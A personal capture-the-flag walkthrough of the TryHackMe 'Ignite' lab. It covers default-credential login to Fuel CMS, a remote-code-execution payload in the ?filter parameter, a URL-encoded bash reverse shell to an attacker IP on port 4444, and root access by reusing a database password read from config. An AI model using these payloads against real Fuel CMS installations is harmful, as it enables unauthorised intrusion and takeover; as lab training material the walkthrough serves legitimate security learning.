Ex-iT's Notes

Ignite

tryhackme
Ignite

Default user/pass (admin:admin) are used for login at /fuel

RCE

Searching for an exploit we find: https://github.com/AssassinUKG/fuleCMS

Looking at the srouce (https://github.com/AssassinUKG/fuleCMS/blob/main/fuelCMS.py) we see that the ?filter parameter can be used to execute arbitrary commands.

In Burp we can better see the output of this command:

plaintext
http://10.10.243.105/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27
bash
...[snip]...
systemtotal 52
drwxrwxrwx 4 root root  4096 Jul 26  2019 .
drwxr-xr-x 3 root root  4096 Jul 26  2019 ..
-rw-r--r-- 1 root root   163 Jul 26  2019 .htaccess
-rwxrwxrwx 1 root root  1427 Jul 26  2019 README.md
drwxrwxrwx 9 root root  4096 Jul 26  2019 assets
-rwxrwxrwx 1 root root   193 Jul 26  2019 composer.json
-rwxrwxrwx 1 root root  6502 Jul 26  2019 contributing.md
drwxrwxrwx 9 root root  4096 Jul 26  2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26  2019 index.php
-rwxrwxrwx 1 root root    30 Jul 26  2019 robots.txt
...[snip]...

Shell

bash
bash -c "bash -i >& /dev/tcp/10.8.119.137/4444 0>&1"

URL encode and use in the RCE url:

plaintext
http://10.10.243.105/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%38%2e%31%31%39%2e%31%33%37%2f%34%34%34%34%20%30%3e%26%31%22%27)%2B%27

Privesc

The database credentials are:

bash
cat /var/www/html/fuel/application/config/database.php
...[snip]...
'hostname' => 'localhost',
        'username' => 'root',
        'password' => 'mememe',
        'database' => 'fuel_schema',
        'dbdriver' => 'mysqli',
...[snip]...

We can use this password to switch to the root user:

bash
su # <- mememe